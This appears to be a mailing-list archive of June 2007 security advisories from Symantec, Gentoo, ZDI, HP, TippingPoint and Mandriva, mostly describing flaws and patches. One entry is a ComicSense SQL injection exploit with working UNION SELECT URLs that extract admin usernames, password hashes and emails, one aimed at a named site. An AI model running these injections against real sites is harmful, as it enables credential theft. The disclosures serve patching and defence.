SYM07-011 Symantec Reporting Server password disclosure

2007-06-05 Thread secure
SYM07-011: Symantec Reporting Server Password Disclosure 
June 5, 2007

Risk Impact: Medium
Remote Access:  Yes
Local Access: Yes
Authentication Required:Yes
Exploit available:  No

Overview
The administrator password for Symantec Reporting Server could be disclosed 
after a failed login attempt. 

Affected Product:
Reporting Server from version 1.0.197.0 up to the solution

Solution: 
Reporting 1.0.224.0
Available with  SAV 10.1 MR6  build 6000 (10.1.6.6000)  or later


Details

Symantec Reporting Server is an optional web application within the Symantec 
System Center console that can be used to be used to create reports about 
Symantec Client Security and Symantec AntiVirus products in an enterprise 
network.  Symantec was notified that a failed attempt to log in to the 
Reporting server could result in displaying a hashed version of the password.  
An attacker could potentially use the hashed password to gain access to the 
Reporting Server database with administrator rights.  


Symantec Response

Symantec engineers confirmed that this vulnerability exists in the versions of 
Reporting Server included with Symantec Client Security 3.1 and SAV CE 10.1, as 
indicated in the table above.  Updates have been released to address the 
vulnerability. 

A successful attacker would gain access only to the Reporting Server database.  
The attacker would not automatically have access to other programs on the 
computer, unless the same account and password are used for other programs.  As 
a best practice, the accounts created for managing Reporting Server should not 
use the same id and password as the users’ network login credentials. 

During the internal review of the issue, Symantec engineers also identified and 
fixed aseparate issue which could allow an attacker disable the authentication 
system for the SCS Reporting server. If successfully exploited, this could 
allow a remote attacker to bypass authentication and access the reporting 
database. 

Mitigation
 - Uninstall Reporting Server if it is not being used
-  Symantec Client Security Console and the Reporting Server interface should 
be restricted to trusted access only.  
-  Ensuring that the Console and Reporting are never visible external to the 
network greatly reduces opportunities for unauthorized remote access. 
-  User accounts for Reporting Server should be different than the user’s 
network login account.

Symantec is not aware of any customers impacted by this issue, or of any 
attempts to exploit the issue.   

As a part of normal best practices, users should keep vendor-supplied patches 
for all application software and operating systems up-to-date.  Symantec 
strongly recommends any affected customers update SAV Reporting immediately to 
protect against possible attempts to exploit this vulnerability. 

Credit
Symantec would like to thank Mikko Korppi for reporting this issue, and 
coordinating with us on the response. 

CVE
This issue is a candidate for inclusion in the Common Vulnerabilities and 
Exposures (CVE) list (http://cve.mitre.org), which standardizes names for 
security problems.   The CVE initiative has assigned CVE-2007-3022 to this issue

Updates
Any future updates to this advisory, if required, will be posted on the 
Symantec Advisory page:
http://www.symantec.com/avcenter/security/Content/2007.06.05.html

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Symantec Product Security Team. 

Symantec takes the security and proper functionality of its products very
seriously. As founding members of the Organization for Internet Safety
(OISafety), Symantec follows the principles of responsible disclosure.
Symantec also subscribes to the vulnerability guidelines outlined by the
National Infrastructure Advisory Council (NIAC). Please contact
[EMAIL PROTECTED] if you feel you have discovered security issue with a
Symantec product. 
Copyright (c) 2007 by Symantec Corp.

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.0.6 (Build 6060)

iQEVAwUBRmW1Af9Lqygkbb6BAQifiwf+NfiU2gdBPuwRVUAQ/sxHEPCEq7E6TI8g
VXBzyVpjUla772Fcko3NPXr3pVAVsJCvEIH5rhiWWGfkVIvaOLBBRVoUr8PED6Nd
HaqlKAvj4PPPygRHGPjos/vaoI03N2MoIAJtjBVFqc/23Yz/0f5NDDjvj5pvzY19
Tf7XyfqYkShgxAqbu8VCb0x8s2Ge6RADFWRI7MHhRuRTkoRVPKoIGHQLuIE+b/S4
/Hu4FpU6QDEfeyat5h9ty9lWtD+6sPWIQcM9ieylRIxZ5JAKJuGSKVt7o8QjxLzg
EjVYtWcBLJAg1Ky/apFNIr6H9TPKwJkuXJHtp3qG+LFR9MQKk51U0w==
=N+kW
-END PGP SIGNATURE-



Comicsense SQL Injection Advisory/Exploit

2007-06-05 Thread s0cratex
*
* Comicsense SQL Injection Advisory/Exploit *
*

by s0cratex
[EMAIL PROTECTED]
http://plexinium.net

-
ComicSense is a script using php / mySQL. 
It allows you to easily host an Online Comic
or Image shack.
You can download it from www.gayadesign.nl/comicsense/
-

The bug is a common sql injection in "index.php"

Line 32:
$sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi";
And the variable $epi is not verified...

Exploit:

Admin username
http://site.com/comic_paht/index.php?epi=-1 UNION SELECT username,1,1 FROM users

MD5 hash password:
http://site.com/comic_paht/index.php?epi=-1 UNION SELECT password,1,1 FROM users

e-Mail adress:
http://www.sneakyshits.com/comics/index.php?epi=-1 union select email,1,1 from 
users


[ GLSA 200706-01 ] libexif: Integer overflow vulnerability

2007-06-05 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200706-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: libexif: Integer overflow vulnerability
  Date: June 05, 2007
  Bugs: #178081
ID: 200706-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


libexif fails to handle Exif (EXchangeable Image File) data inputs,
making it vulnerable to an integer overflow.

Background
==

libexif is a library for parsing, editing and saving Exif data.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  media-libs/libexif  < 0.6.15>= 0.6.15

Description
===

Victor Stinner reported an integer overflow in the
exif_data_load_data_entry() function from file exif-data.c while
handling Exif data.

Impact
==

An attacker could entice a user to process a file with specially
crafted Exif extensions with an application making use of libexif,
which will trigger the integer overflow and potentially execute
arbitrary code or crash the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All libexif users should upgrade to the latest version. Please note
that users upgrading from "<=media-libs/libexif-0.6.13" should also run
revdep-rebuild after their upgrade.

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/libexif-0.6.15"
# revdep-rebuild --library=/usr/lib/libexif.so

References
==

  [ 1 ] CVE-2007-2645
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2645

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200706-01.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgp4PZAP7yvwS.pgp
Description: PGP signature


ZDI-07-034: CA Multiple Product AV Engine CAB Filename Parsing Stack Overflow Vulnerability

2007-06-05 Thread zdi-disclosures
ZDI-07-034: CA Multiple Product AV Engine CAB Filename Parsing Stack
Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-034.html
June  5, 2007

-- CVE ID:
CVE-2007-2863

-- Affected Vendor:
Computer Associates

-- Affected Products:
CA Anti-Virus
eTrust EZ Antivirus
CA Internet Security Suite 2007
eTrust Internet Security Suite
eTrust EZ Armor
CA Threat Manager
CA Protection Suites
CA Secure Content Manager
CA Anti-Virus Gateway
Unicenter Network and Systems Management
BrightStor ARCserve Backup
CA Common Services

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since November 30, 2006 by Digital Vaccine protection
filter ID 4874. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of various Computer Associates products.

The specific flaw exists in the parsing of .CAB archives. When a long
filename contained in the .CAB is processed by vete.dll an exploitable
stack overflow may occur.

-- Vendor Response:
Computer Associates has issued an update to correct this vulnerability.
More details can be found at:
 
http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp

-- Disclosure Timeline:
2006.11.08 - Vulnerability reported to vendor
2006.11.30 - Digital Vaccine released to TippingPoint customers
2007.06.05 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.


CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] 


SYM07-012 Symantec Reporting Server elevation of privilege

2007-06-05 Thread secure
SYM07-012 Symantec Reporting Server Elevation of Privilege

June 5, 2007 

Risk Impact
Medium 

Remote Access: Yes
Local Access: Yes
Authentication Required: No
Exploit available:  No

Overview
Files created by a Reporting Server may be accessible to an unauthorized user.  
  

Affected Products 
Reporting 1.0.197.0,  up to the solution SAV 10.1 MR6  build 6000 (10.1.6.6000) 
 or later

Solution
Reporting 1.0.224.0 or later

Reporting is not available as a stand-alone application, but is distributed 
with Symantec AntiVirus and Symantec Client Security.  Reporting 1.0.224.0  or 
later is available with the following products
SAV 10.1 MR6  build 6000 (10.1.6.6000)  or later
SCS 3.1 MR6 build 6000 (3.1.6.6000) or later


Details

Symantec Reporting Server is an optional web application within the Symantec 
System Center console that can be used to be used to create reports about 
Symantec Client Security and Symantec AntiVirus products in an enterprise 
network.

Symantec was notified that a file created in the process of exporting data from 
Reporting Server could be potentially be manipulated by an unauthorized user to 
create a malicious executable file.   An attacker could then execute the file, 
potentially gaining access to the server in the context of the web server user. 
 

Symantec Response

Symantec engineers verified that the issue exists in Reporting Server included 
with the product versions listed above.   The error occurred due to the 
improper initialization of a variable, and updates have been released to 
correct the problem.  

This vulnerability affects only systems on which the Reporting Server program 
is installed. Individual client systems are not affected.

Symantec is not aware of any customers impacted by this issue, or of any 
attempts to exploit the issue.  However, we recommend that customers update 
Reporting Server immediately to protect against possible attempts to exploit 
this issue. 


Mitigation and best practices

- Uninstall Reporting Server if it is not being used
 - Symantec Client Security Console (SCS Console) and the Reporting Server 
interface should be restricted to trusted access only.  
 - Ensure that the SCS Console and Reporting Server interface are never visible 
external to the network.  This greatly reduces opportunities for unauthorized 
remote access. 
- User accounts for Reporting Server should be unique, and different from the 
user’s network login account.  
- Delete exported data files which are no longer needed.  


Credit
Symantec would like to thank Ertunga Arsal of Tech Data GmbH & Co. OHG for 
reporting this issue, and coordinating with us on the response.  

CVE
This issue is a candidate for inclusion in the Common Vulnerabilities and 
Exposures (CVE) list (http://cve.mitre.org), which standardizes names for 
security problems.   The CVE initiative has assigned CVE-2007-3021 to this issue



-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Symantec Product Security Team


Symantec takes the security and proper functionality of its products very
seriously. As founding members of the 
Organization for Internet Safety (OISafety), Symantec follows the
principles of responsible disclosure. Symantec also 
subscribes to the vulnerability guidelines outlined by the National
Infrastructure Advisory Council (NIAC). Please contact 
[EMAIL PROTECTED] if you feel you have discovered a potential or actual
security issue with a Symantec product. 

Copyright (c) 2007 by Symantec Corp.

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.0.6 (Build 6060)

iQEVAwUBRmW5bf9Lqygkbb6BAQjVQQf7BjFMagCcjl+kkYiEEcphatUuDi1sDZ+h
r2eRvO+8RbCzNoGWuBFiK9ExIhhQNRTDCkvceDcFFOBtKVv7wg/LGw935O8P7+PK
lsdT+UEdCFqyUu+mteYARW4uQ9b17luDoxU2cEa6iZ9qS/6uzLEAkNQXo0Tm2PlT
elYjlv5m13FSbAd+KfRh94XRguxrKZ/i8KxzsS8E0RvmADW+mjYbNv1rRT5C3AGr
Kl7f3c07U4+DfISxDcAVjZwgK6lA42qLih8M2iC4P2bQJ1Ml3Uukxnt1EOLFBNo2
5UXMaAZ7lSK7l+ZIg1q57h5tsXOp9FQQaN7rSk2ObEvGoGheK3wiww==
=CXAH
-END PGP SIGNATURE-






ZDI-07-035: CA Multiple Product AV Engine CAB Header Parsing Stack Overflow Vulnerability

2007-06-05 Thread zdi-disclosures
ZDI-07-035: CA Multiple Product AV Engine CAB Header Parsing Stack
Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-035.html
June  5, 2007

-- CVE ID:
CVE-2007-2864

-- Affected Vendor:
Computer Associates

-- Affected Products:
CA Anti-Virus
eTrust EZ Antivirus
CA Internet Security Suite 2007
eTrust Internet Security Suite
eTrust EZ Armor
CA Threat Manager
CA Protection Suites
CA Secure Content Manager
CA Anti-Virus Gateway
Unicenter Network and Systems Management
BrightStor ARCserve Backup
CA Common Services

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of various Computer Associates products.

The specific flaw exists within the processing of an improperly defined
"coffFiles" field in .CAB archives. Large values result in an unbounded
data copy operation which can result in an exploitable stack-based
buffer overflow.

-- Vendor Response:
Computer Associates has issued an update to correct this vulnerability.
More details can be found at:
 
http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp

-- Disclosure Timeline:
2007.02.16 - Vulnerability reported to vendor
2007.06.05 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.


CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] 


[security bulletin] HPSBUX02218 SSRT071424 rev.1 - HP-UX running CIFS Server (Samba), Remote Arbitrary Code Execution

2007-06-05 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01067768
Version: 1

HPSBUX02218 SSRT071424 rev.1 - HP-UX running CIFS Server (Samba), Remote 
Arbitrary Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2007-05-29
Last Updated: 2007-06-04

Potential Security Impact: Remote arbitrary code execution

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential vulnerabilities have been identified with HP-UX running CIFS Server 
(Samba). The vulnerabilities could be exploited remotely to execute arbitrary 
code.

References: CVE-2007-2446, CVE-2007-2447

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running CIFS Server (Samba) A.02.01, 
A.02.01.01,A.02.01.02, A.02.02, A.02.02.01, A.02.02.02, A.02.03, A.02.03.01.

BACKGROUND

To determine if an HP-UX system has an affected version, search the output of 
"swlist -a revision -l fileset" for an affected fileset. Then determine if the 
recommended patch or update is installed. 

AFFECTED VERSIONS 

HP-UX B.11.11 
HP-UX B.11.23 
HP-UX B.11.31 
== 
CIFS-Server.CIFS-ADMIN 
CIFS-Server.CIFS-DOC 
CIFS-Server.CIFS-LIB 
CIFS-Server.CIFS-MAN 
CIFS-Server.CIFS-RUN 
CIFS-Server.CIFS-UTIL 
action: install revision A.02.03.02 or subsequent 

END AFFECTED VERSIONS 

RESOLUTION

HP has made the following available to resolve the vulnerability: 

HP-UX release  CIFS Server (Samba) revision  Install recommendation  
B.11.11, B.11.23, B.11.31 A.02.01, A.02.01.01, A.02.01.02, A.02.02, A.02.02.01, 
A.02.02.02, A.02.03, A.02.03.01 revision A.02.03.02 or subsequent  

The updates can be downloaded from http://www.hp.com/go/softwaredepot/ 

MANUAL ACTIONS: Yes - Update 
CIFS / Samba on HP-UX B.11.11 install revision A.02.03.02 or subsequent. 
CIFS / Samba on HP-UX B.11.23 install revision A.02.03.02 or subsequent. 
CIFS / Samba on HP-UX B.11.31 install revision A.02.03.02 or subsequent. 

PRODUCT SPECIFIC INFORMATION 
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security 
Bulletins and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see: https://www.hp.com/go/swa 

HISTORY 
Version: 1 (rev.1) - 04 June 2007 Initial release 

Third Party Security Patches: Third party security patches which are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy. 


Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED] 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED] 
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 
represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW 
MA = HP Management Agents 
MI = Misc. 3rd Party SW 
MP = HP MPE/iX 
NS = HP NonStop Servers 
OV = HP OpenVMS 
PI = HP Printing & Imaging 
ST = HP Storage SW 
TL = HP Trusted Linux 
TU = HP Tru64 UNIX 
UX = HP-UX 
VV = HP VirtualVault 

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to t

TPTI-07-09: Macrovision FLEXnet boisweb.dll ActiveX Control Buffer Overflow Vulnerability

2007-06-05 Thread TSRT
TPTI-07-09: Macrovision FLEXnet boisweb.dll ActiveX Control Buffer
Overflow Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-07-09
June  4, 2007

-- CVE ID:
CVE-2007-2419

-- Affected Vendor:
Macrovision

-- Affected Products:
Update Service 3.x
Update Service 4.x
Update Service 5.x
FLEXnet Connect 6

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since November  6, 2006 by Digital Vaccine protection
filter ID 4323, 4327. For further product information on the TippingPoint 
IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Business Objects Crystal Reports.
Exploitation requires the target to visit a malicious web site.

This specific flaw exists within the ActiveX control with CLSID
85A4A99C-8C3D-499E-A386-E0743DFF8FB7. Specifying large values to two
specific functions available in this control results in an exploitable
stack based buffer overflow.

The vulnerable function / parameters include:

* DownloadAndExecute(), second of five parameters
* AddFileEx(), third of seven parameters

-- Vendor Response:
Notification was recently (January) sent to Macrovision customers about
the vulnerability and the correct way to resolve it (patching to a
newer version of the agent resolves the issue). The exact timing of
this deployment is left to our customers and partner.

-- Disclosure Timeline:
2006.06.22 - Vulnerability reported to vendor
2006.11.06 - Digital Vaccine released to TippingPoint customers
2007.06.04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Pedram Amini, TippingPoint DVLabs

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] 


TPTI-07-10: Centennial Software XferWan.exe Stack Overflow Vulnerability

2007-06-05 Thread TSRT
TPTI-07-10: Centennial Software XferWan.exe Stack Overflow Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-07-10
June  4, 2007

-- CVE ID:
CVE-2007-2514

-- Affected Vendor:
Centennial Software

-- Affected Products:
Symantec Discovery 6.5

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since April  3, 2007 by Digital Vaccine protection
filter ID 5231. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of software utilizing Centennial Software
XferWan. Authentication is not required to exploit this vulnerability.

The specific flaw exists during the parsing of overly long requests to
the XferWAN process. When logging requests, user-supplied data is
copied to the stack resulting in an exploitable buffer overflow
condition. The following disassembly excerpt from the logging function
demonstrates the issue:

004047A0 mov cl, Filename[eax]
004047A6 mov [esp+eax+890h+ExistingFileName], cl
004047AD inc eax
004047AE test cl, cl
004047B0 jnz short loc_4047A0

A lack of sanity checking on the size of 'Filename' results in an
exploitable stack-based  buffer overflow vulnerability that can result
in a system compromise running under the context of the SYSTEM user.

-- Vendor Response:
Centennial has rectified an issue in the XFERWAN omponent of Centennial
Discovery which could be remotely exploited by malicious people to
compromise a system.

This issue only affects systems running non-secure communications,
which comprise a very small percentage of installations worldwide. 
Customers can find instructions on how to identify if they are
susceptible to the vulnerability and correct, if necessary on the
Centennial Customer Support website.

-- Disclosure Timeline:
2007.03.07 - Vulnerability reported to vendor
2007.04.03 - Digital Vaccine released to TippingPoint customers
2007.06.04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Cody Pierce, TippingPoint DVLabs


CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] 


[ MDKSA-2007:112 ] - Updated mplayer packages fix buffer overflow vulnerability

2007-06-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:112
 http://www.mandriva.com/security/
 ___
 
 Package : mplayer
 Date: June 4, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0
 ___
 
 Problem Description:
 
 Buffer overflow in the asmrp_eval function for the Real Media input
 plugin allows remote attackers to cause a denial of service and
 possibly execute arbitrary code via a rulebook with a large number
 of rulematches.
 
 Updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6172
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 830fb73b1b7ef7bce6f6f21a44d9e89f  
2007.0/i586/libdha1.0-1.0-1.pre8.13.3mdv2007.0.i586.rpm
 0235e5abe7ff905ccbe2623876946915  
2007.0/i586/mencoder-1.0-1.pre8.13.3mdv2007.0.i586.rpm
 54faca2a832a87403e4ac4f02b719d9e  
2007.0/i586/mplayer-1.0-1.pre8.13.3mdv2007.0.i586.rpm
 3adef91daba9c23859a411e6e7fed99d  
2007.0/i586/mplayer-gui-1.0-1.pre8.13.3mdv2007.0.i586.rpm 
 77b7d6c6bcaeabeacffc1a67b11783e3  
2007.0/SRPMS/mplayer-1.0-1.pre8.13.3mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 7db8e08bbc3a2a7780b9cb6172372966  
2007.0/x86_64/mencoder-1.0-1.pre8.13.3mdv2007.0.x86_64.rpm
 5b94344377c17fc27cc6387c1f8d56dc  
2007.0/x86_64/mplayer-1.0-1.pre8.13.3mdv2007.0.x86_64.rpm
 ec5d71b9b1ab30deb6fe717a4361c7ed  
2007.0/x86_64/mplayer-gui-1.0-1.pre8.13.3mdv2007.0.x86_64.rpm 
 77b7d6c6bcaeabeacffc1a67b11783e3  
2007.0/SRPMS/mplayer-1.0-1.pre8.13.3mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 e35f5cf2df21511dc7c1b8b5d95a4936  
2007.1/i586/libdha1.0-1.0-1.rc1.11.1mdv2007.1.i586.rpm
 da4702585498a73d5697e55a5e08f834  
2007.1/i586/mencoder-1.0-1.rc1.11.1mdv2007.1.i586.rpm
 22be41581519dc8d8e6e1a28472fe35d  
2007.1/i586/mplayer-1.0-1.rc1.11.1mdv2007.1.i586.rpm
 76bd7950cd1790bbf3caeaa3de75202a  
2007.1/i586/mplayer-doc-1.0-1.rc1.11.1mdv2007.1.i586.rpm
 48cc118f6e33ddc1db7268b7a4436c51  
2007.1/i586/mplayer-gui-1.0-1.rc1.11.1mdv2007.1.i586.rpm 
 f6328948547b7dcb4c085ce1e959986f  
2007.1/SRPMS/mplayer-1.0-1.rc1.11.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 780ef1ea825746d89c0ad855920383fe  
2007.1/x86_64/mencoder-1.0-1.rc1.11.1mdv2007.1.x86_64.rpm
 1d338368b9c85ba5b537eab6d7458e26  
2007.1/x86_64/mplayer-1.0-1.rc1.11.1mdv2007.1.x86_64.rpm
 274d7330781b618dcf413fda2231615f  
2007.1/x86_64/mplayer-doc-1.0-1.rc1.11.1mdv2007.1.x86_64.rpm
 955284559324b44e9e6ddbf60c682d68  
2007.1/x86_64/mplayer-gui-1.0-1.rc1.11.1mdv2007.1.x86_64.rpm 
 f6328948547b7dcb4c085ce1e959986f  
2007.1/SRPMS/mplayer-1.0-1.rc1.11.1mdv2007.1.src.rpm

 Corporate 3.0:
 f1b7f04506edd2f048821aa868f312b0  
corporate/3.0/i586/libdha0.1-1.0-0.pre3.14.11.C30mdk.i586.rpm
 4250be5ebe5ccae0f1233343699aa3a9  
corporate/3.0/i586/libpostproc0-1.0-0.pre3.14.11.C30mdk.i586.rpm
 9c2ee76860184398988a33347d591fd2  
corporate/3.0/i586/libpostproc0-devel-1.0-0.pre3.14.11.C30mdk.i586.rpm
 5d1d7efad438f4c645a9124b6c5a2ac8  
corporate/3.0/i586/mencoder-1.0-0.pre3.14.11.C30mdk.i586.rpm
 fdd5ab4e3aefef7ea1f42c2bbf48d860  
corporate/3.0/i586/mplayer-1.0-0.pre3.14.11.C30mdk.i586.rpm
 b493e323ce7e94c5728cc2a373c40fc5  
corporate/3.0/i586/mplayer-gui-1.0-0.pre3.14.11.C30mdk.i586.rpm 
 228c3d1cfdc176ce0ca36af225a15683  
corporate/3.0/SRPMS/mplayer-1.0-0.pre3.14.11.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 5703a3b6ccd14cd700762f63b9da58ca  
corporate/3.0/x86_64/lib64postproc0-1.0-0.pre3.14.11.C30mdk.x86_64.rpm
 16152708c55cd45a374398cb1b0aff1a  
corporate/3.0/x86_64/lib64postproc0-devel-1.0-0.pre3.14.11.C30mdk.x86_64.rpm
 2fc00f3155f4f51875b66ae27207c275  
corporate/3.0/x86_64/mplayer-1.0-0.pre3.14.11.C30mdk.x86_64.rpm
 152fbb089a239522190c7ec6d1720c46  
corporate/3.0/x86_64/mplayer-gui-1.0-0.pre3.14.11.C30mdk.x86_64.rpm 
 228c3d1cfdc176ce0ca36af225a15683  
corporate/3.0/SRPMS/mplayer-1.0-0.pre3.14.11.C30mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Secu

TPTI-07-08: Symantec Veritas Storage Foundation Scheduler Service Authentication Bypass Vulnerability

2007-06-05 Thread TSRT
TPTI-07-08: Symantec Veritas Storage Foundation Scheduler Service
Authentication Bypass Vulnerability 
http://dvlabs.tippingpoint.com/advisory/TPTI-07-08
June  4, 2007

-- CVE ID:
CVE-2007-2279

-- Affected Vendor:
Symantec

-- Affected Products:
Veritas Storage Foundation

-- Vulnerability Details:
This vulnerability allows an attacker to execute arbitrary code on
